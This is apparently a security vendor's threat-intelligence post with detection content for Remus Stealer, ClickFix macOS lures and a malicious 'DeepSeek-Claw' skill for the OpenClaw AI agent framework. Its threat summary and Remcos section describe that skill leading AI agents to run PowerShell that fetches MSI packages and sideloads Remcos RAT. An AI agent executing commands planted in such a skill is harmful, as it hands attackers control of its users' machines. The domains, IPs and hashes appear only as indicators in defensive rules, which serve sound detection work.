
Remus Stealer & Weaponized AI Frameworks: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
May 9, 2026

Threat Summary

Recent OTX pulses indicate a convergence of high-evasion credential theft and novel delivery vectors targeting both Windows and macOS ecosystems. The intelligence highlights three distinct but technically sophisticated campaigns:

  1. ClickFix macOS Campaign: A resurgence of social engineering tactics where threat actors host malicious Terminal commands on blog platforms, disguised as troubleshooting for fake macOS utilities. This delivers infostealers like Macsync, Shub Stealer, and AMOS.
  2. Remus Stealer Evolution: An advanced evolution of the Lumma Stealer, emerging after alleged Lumma core members were doxxed in late 2025. Remus specifically bypasses Application-Bound Encryption (ABE) in browsers and utilizes Ethereum blockchain transactions for C2 communication (Etherhiding).
  3. Weaponized AI Frameworks: The weaponization of the OpenClaw AI agent framework via a malicious "DeepSeek-Claw" skill. This campaign delivers Remcos RAT and GhostLoader by tricking AI agents/developers into executing PowerShell commands that download malicious MSI packages, leveraging signed GoToMeeting binaries for sideloading.

Collective Objective: Credential harvesting (browser cookies, crypto wallets), persistent remote access (RAT), and data exfiltration via non-standard C2 channels (blockchain).

Threat Actor / Malware Profile

Remus Stealer (Lumma Successor)

  • Type: 64-bit Information Stealer.
  • Origin: Evolved from Lumma Stealer following the doxxing of Lumma developers (Aug-Oct 2025).
  • Distribution: Initial access patterns suggest similar payload delivery to its predecessor, likely via cracked software or fake updates.
  • Behavior:
    • ABE Bypass: Capable of bypassing Chrome/Edge Application-Bound Encryption to steal cookies and sessions.
    • C2 Innovation: Uses the Ethereum blockchain for C2 communication (storing commands in transaction data fields), a technique known as Etherhiding.
    • Payload: Steals cryptocurrency wallet data, browser credentials, and system information.

ClickFix macOS Campaign

  • Malware Families: Macsync, Shub Stealer, AMOS, PhantomPulse.
  • Distribution: "ClickFix" style social engineering. Victims are lured to blog posts or content platforms offering fake macOS utilities or troubleshooting steps.
  • Execution: Victims are coerced into copying and pasting malicious AppleScript or Bash commands into the Terminal.
  • Objective: Exfiltration of iCloud Keychain data, browser passwords, and specific macOS system files.

Remcos RAT & GhostLoader

  • Distribution: Malicious "DeepSeek-Claw" skill within the OpenClaw AI framework.
  • Payload Behavior:
    • GhostLoader: A sophisticated shellcode loader designed to obfuscate the payload in memory.
    • Remcos RAT: A full-featured Remote Access Trojan allowing surveillance, keylogging, and command execution.
  • Persistence: Uses PowerShell to download an MSI. The MSI contains a legitimate, signed GoToMeeting executable used to DLL sideload the malicious payload (Remcos).

IOC Analysis

The provided indicators reveal a cross-platform infrastructure:

  • Domains (C2/Phishing): Primarily associated with the ClickFix and OpenClaw campaigns (e.g., jihiz.com, dropras.xyz). These domains likely host the malicious payloads or the fake troubleshooting blogs.
  • IPv4 Addresses: A block of IPs (217.156.122.x) associated with the Remus Stealer infrastructure suggests a dedicated hosting setup, possibly bulletproof hosting, resistant to takedown.
  • File Hashes (MD5/SHA1): Specific hashes provided for the OpenClaw/Remcos MSI and payload files. These are critical for EDR detection and retrospective hunting.

Operational Guidance:

  • SOC Teams: Immediately block the listed domains and IP ranges at the perimeter/firewall.
  • EDR: Load the provided MD5/SHA1 hashes into custom detection rules. Look for unsigned binaries attempting to interact with the 217.156.122.0/24 subnet.
  • Threat Intel: The domains malext.com and miappl.com exhibit naming patterns consistent with "malvertising" or "fake app" distribution networks often seen in initial access brokers.
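The matching behind the guidance above, as an added example in Python (not code from the OTX pulses or from this post). The four domains and the 217.156.122.0/24 range come from the IOC analysis; the record fields (remote_host, remote_ip, signed) and the sample connection records are constructed for illustration. Domains are matched as the name itself or a subdomain of it (a plain substring test would also flag look-alikes such as notjihiz.com), IPs are tested against the range with the ipaddress module, and a hit from an unsigned initiating binary is flagged separately as the EDR guidance suggests.

```python
"""Added example: apply the post's IOC guidance to constructed network-connection records."""
import ipaddress
from typing import Optional

# Indicators as listed in the post; the /24 reflects the "217.156.122.x" block it describes.
IOC_DOMAINS = {"jihiz.com", "dropras.xyz", "malext.com", "miappl.com"}
IOC_NETWORKS = [ipaddress.ip_network("217.156.122.0/24")]


def domain_hit(hostname: str) -> Optional[str]:
    """Return the matching IOC domain if hostname is that domain or a subdomain of it."""
    host = hostname.lower().rstrip(".")
    for ioc in IOC_DOMAINS:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


def network_hit(ip_text: str) -> Optional[str]:
    """Return the IOC network containing ip_text; unparsable or empty values never match."""
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:
        return None
    for net in IOC_NETWORKS:
        if addr in net:
            return str(net)
    return None


def triage(event: dict) -> list:
    """Classify one connection record into zero or more IOC findings."""
    findings = []
    domain = domain_hit(event.get("remote_host", ""))
    if domain:
        findings.append("domain:" + domain)
    network = network_hit(event.get("remote_ip", ""))
    if network:
        findings.append("network:" + network)
        # The post's EDR guidance: unsigned binaries talking to the Remus hosting range.
        if not event.get("signed", True):
            findings.append("unsigned_binary_to_remus_range")
    return findings


# Constructed sample records (field names are an assumption, modelled on EDR network telemetry).
SAMPLE_EVENTS = [
    {"process": "updater.exe", "signed": False, "remote_host": "", "remote_ip": "217.156.122.57"},
    {"process": "chrome.exe", "signed": True, "remote_host": "cdn.jihiz.com", "remote_ip": "203.0.113.10"},
    {"process": "svchost.exe", "signed": True, "remote_host": "updates.example.net", "remote_ip": "192.0.2.25"},
    {"process": "curl", "signed": True, "remote_host": "notjihiz.com", "remote_ip": "198.51.100.7"},
]


def run(events=SAMPLE_EVENTS) -> dict:
    """Map process name -> findings for every record that produced at least one finding."""
    results = {}
    for event in events:
        hits = triage(event)
        if hits:
            results[event["process"]] = hits
    return results


if __name__ == "__main__":
    for proc, hits in run().items():
        print(f"{proc:<14} {', '.join(hits)}")
```

Running the block flags updater.exe (unsigned, in the Remus range) and chrome.exe (a jihiz.com subdomain) and leaves the look-alike host and the benign update traffic untouched.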

Detection Engineering

The following detection logic targets the specific behaviors identified in the OTX pulses: PowerShell-based MSI delivery and GoToMeeting sideloading (Remcos), macOS Terminal abuse (ClickFix), and browser credential theft patterns (Remus).

Sigma rules (YAML):
title: Potential Remcos RAT via PowerShell MSI Download and Sideload
id: 4c8f1d2e-6a3b-4f5c-9e1d-8a2b3c4d5e6f
description: Detects PowerShell commands downloading MSI files associated with Remcos/GhostLoader delivery, followed by execution of signed binaries often used for sideloading like GoToMeeting.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/663b8a1c8f9b1c0a1b2c3d4e
tags:
    - attack.execution
    - attack.t1059.001
    - attack.s0332
logsource:
    category: process_creation
    product: windows
detection:
    selection_download:
        Image|endswith: '\powershell.exe'
        # both substrings must appear in the same command line; a duplicated YAML key would silently drop one of them
        CommandLine|contains|all:
            - 'Invoke-WebRequest'
            - '.msi'
    selection_indicators:
        CommandLine|contains:
            - 'dropras.xyz'
            - 'trackpipe.dev'
    selection_sideload:
        Image|endswith:
            - '\g2mstart.exe'
            - '\g2mcomm.exe'
            - '\g2mlauncher.exe'
        # the signed GoToMeeting binary is started by the installer, so key on the parent process rather than the command line
        ParentImage|endswith: '\msiexec.exe'
    condition: 1 of selection_*
falsepositives:
    - Legitimate GoToMeeting installation (rare via PowerShell)
level: high
---
title: macOS ClickFix Fake Utility Execution Pattern
id: 5d9e2f3a-7b4c-0e6d-1f2a-3b4c5d6e7f8a
description: Detects execution of suspicious bash/osascript commands often used in ClickFix campaigns to download payloads from domains resembling ad-tech or utilities.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/663b8a1c8f9b1c0a1b2c3d4f
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    category: process_creation
    product: macos
detection:
    selection_shell:
        Image|endswith:
            - '/bin/bash'
            - '/bin/sh'
            - '/usr/bin/osascript'
    selection_indicators:
        CommandLine|contains:
            - 'jihiz.com'
            - 'kayeart.com'
            - 'bintail.com'
            - 'malext.com'
    selection_curl:
        CommandLine|contains: 'curl'
    condition: selection_shell and (selection_indicators or selection_curl)
falsepositives:
    - Legitimate software updates via terminal
level: high
---
title: Remus Stealer Browser Encryption Bypass Activity
id: 00000000-0000-4000-8000-000000000000  # placeholder: the original value was not a valid UUID; generate a fresh UUIDv4 before deployment
description: Detects non-browser processes opening handles to Chrome, Edge or Brave with memory read/write or thread-creation rights, indicative of Remus/Lumma stealer behavior attempting to bypass application-bound encryption.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/663b8a1c8f9b1c0a1b2c3d50
tags:
    - attack.credential_access
    - attack.t1555.003
logsource:
    category: process_access
    product: windows
detection:
    # process_access events (Sysmon EID 10) carry the target process image, not a file path,
    # so the browser executables are matched here rather than the User Data directory
    selection_target:
        TargetImage|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\brave.exe'
    selection_granted_access:
        GrantedAccess|contains:
            - '0x1010'
            - '0x1410'
            - '0x143a'
    exclusion_image:
        SourceImage|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\brave.exe'
    condition: selection_target and selection_granted_access and not exclusion_image
falsepositives:
    - Legitimate password managers or browser extensions
level: medium
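To check what the first rule would actually fire on, here is a minimal evaluator for Sigma-style selections, added as an example (it is not part of the post and not a Sigma tool; pySigma or sigma-cli is what you would use in production). It implements only the modifiers that rule uses (endswith, contains, and the |all qualifier), treats a list of values as OR, a selection map as AND, and the condition "1 of selection_*" as OR over selections. The sideload selection here keys on ParentImage ending in msiexec.exe, an assumption of this example, and the three process_creation events are constructed; only the dropras.xyz domain comes from the post.

```python
"""Added example: evaluate Sigma-style selections over constructed process_creation events."""


def _match(actual, modifier, expected):
    """Compare one field value case-insensitively, as Sigma string matching is."""
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "endswith":
        return a.endswith(e)
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "contains":
        return e in a
    return a == e


def field_matches(event, key, expected):
    """key is 'Field|modifier[|all]'; list values are OR unless |all is present."""
    field, *mods = key.split("|")
    modifier = next((m for m in mods if m != "all"), "equals")
    values = expected if isinstance(expected, list) else [expected]
    hits = [_match(event.get(field), modifier, v) for v in values]
    return all(hits) if "all" in mods else any(hits)


def selection_matches(event, selection):
    """Every key inside one selection must match (a Sigma map is an AND)."""
    return all(field_matches(event, k, v) for k, v in selection.items())


# The detection block of the Remcos MSI-download rule, transcribed as Python data.
REMCOS_MSI_RULE = {
    "selection_download": {
        "Image|endswith": "\\powershell.exe",
        "CommandLine|contains|all": ["Invoke-WebRequest", ".msi"],
    },
    "selection_indicators": {
        "CommandLine|contains": ["dropras.xyz", "trackpipe.dev"],
    },
    "selection_sideload": {
        "Image|endswith": ["\\g2mstart.exe", "\\g2mcomm.exe", "\\g2mlauncher.exe"],
        "ParentImage|endswith": "\\msiexec.exe",  # assumption: the sideload is launched by the installer
    },
}


def evaluate(event, rule=REMCOS_MSI_RULE):
    """condition: 1 of selection_*  -> the list of selections that matched (empty = no alert)."""
    return [name for name, sel in rule.items() if selection_matches(event, sel)]


# Constructed events; paths are illustrative, the domain is one the post lists.
SAMPLE_EVENTS = {
    "msi_download": {
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell -c Invoke-WebRequest http://dropras.xyz/setup.msi -OutFile C:\\Users\\Public\\setup.msi",
        "ParentImage": "C:\\Users\\dev\\agent-host.exe",
    },
    "benign_download": {  # Invoke-WebRequest with neither an .msi nor a listed domain
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell -c Invoke-WebRequest https://example.org/report.json",
        "ParentImage": "C:\\Windows\\explorer.exe",
    },
    "sideload_launch": {
        "Image": "C:\\Users\\Public\\g2mstart.exe",
        "CommandLine": "g2mstart.exe",
        "ParentImage": "C:\\Windows\\System32\\msiexec.exe",
    },
}


def run(events=SAMPLE_EVENTS):
    """Map event name -> matched selections."""
    return {name: evaluate(ev) for name, ev in events.items()}


if __name__ == "__main__":
    for name, hits in run().items():
        print(f"{name:<16} {'ALERT ' + ','.join(hits) if hits else 'no match'}")
```

The benign download is the case worth keeping in a rule's test set: it shows that the |all qualifier, not just the presence of Invoke-WebRequest, is what separates the Remcos delivery from ordinary scripted downloads.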


Microsoft Defender advanced hunting query (KQL):
// Hunt for Remcos/ClickFix Network Indicators
// RemoteUrl may hold a full URL or a hostname, so use has_any rather than an exact-match list;
// the /24 check covers the rest of the Remus hosting block the IOC analysis describes
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (
    'jihiz.com', 'kayeart.com', 'bintail.com', 'wusetail.com', 'malext.com',
    'miappl.com', 'pla7ina.cfd', 'dropras.xyz', 'trackpipe.dev'
    )
    or RemoteIP in (
    '45.94.47.204', '217.156.122.57', '217.156.122.75',
    '217.156.122.12', '45.151.106.110'
    )
    or ipv4_is_in_range(RemoteIP, '217.156.122.0/24')
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort
| extend IOCHit = "Remcos_ClickFix_Pulse"


Endpoint IOC hunt script (PowerShell):
# IOC Hunt Script for Remcos / GhostLoader Hashes
# The pulse lists both MD5 (32 hex chars) and SHA1 (40 hex chars) values, so both algorithms
# are computed for each file; -contains compares case-insensitively, so hash casing does not matter.
$targetHashes = @(
    "1c267cab0a800a7b2d598bc1b112d5ce",
    "2a5f619c966ef79f4586a433e3d5e7ba",
    "2c4b7c8b48e6b4e5f3e8854f2abfedb5",
    "82536825e700f4c863238a90dd314687",
    "cc1af839a956c8e2bf8e721f5d3b7373",
    "470c3803bd5a4770eb5470a84a831f187f591c64"
)
$md5Targets  = $targetHashes | Where-Object { $_.Length -eq 32 }
$sha1Targets = $targetHashes | Where-Object { $_.Length -eq 40 }

Write-Host "[+] Hunting for Remcos/GhostLoader file artifacts..." -ForegroundColor Cyan

# Scan the system drive for the listed hashes (full recursion; expect this to take a while on large volumes)
Get-ChildItem -Path C:\ -Recurse -File -Include *.exe,*.msi,*.dll,*.bin -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_.FullName
        $md5  = (Get-FileHash -Path $file -Algorithm MD5  -ErrorAction SilentlyContinue).Hash
        $sha1 = (Get-FileHash -Path $file -Algorithm SHA1 -ErrorAction SilentlyContinue).Hash
        if (($md5 -and $md5Targets -contains $md5) -or ($sha1 -and $sha1Targets -contains $sha1)) {
            Write-Host "[!] MALICIOUS FILE FOUND: $file (MD5=$md5 SHA1=$sha1)" -ForegroundColor Red
        }
    }

# Check DNS Cache for C2 Domains (the domain itself or any subdomain of it)
$domains = @("dropras.xyz", "trackpipe.dev", "malext.com", "jihiz.com")
Write-Host "[+] Checking DNS Cache for ClickFix/Remcos C2 domains..." -ForegroundColor Cyan

Get-DnsClientCache |
    Where-Object {
        $entry = $_.Entry.ToLower()
        @($domains | Where-Object { $entry -eq $_ -or $entry.EndsWith(".$_") }).Count -gt 0
    } |
    Select-Object Entry, Data, TimeToLive |
    Format-Table -AutoSize

Response Priorities

  • Immediate: Block all listed domains and IP ranges on perimeter firewalls and secure web gateways. Quarantine any endpoints matching the provided file hashes.
  • 24h: Initiate credential theft investigation. Since Remus and AMOS target browser cookies and wallets, force a password reset for high-privilege accounts and rotate cryptocurrency wallet seeds for exposed development machines.
  • 1 Week: Review and restrict the use of AI agent frameworks (like OpenClaw) in development environments. Implement strict application whitelisting for PowerShell execution and MSI installation packages. Update macOS policies to restrict Terminal execution for non-admin users to mitigate ClickFix.
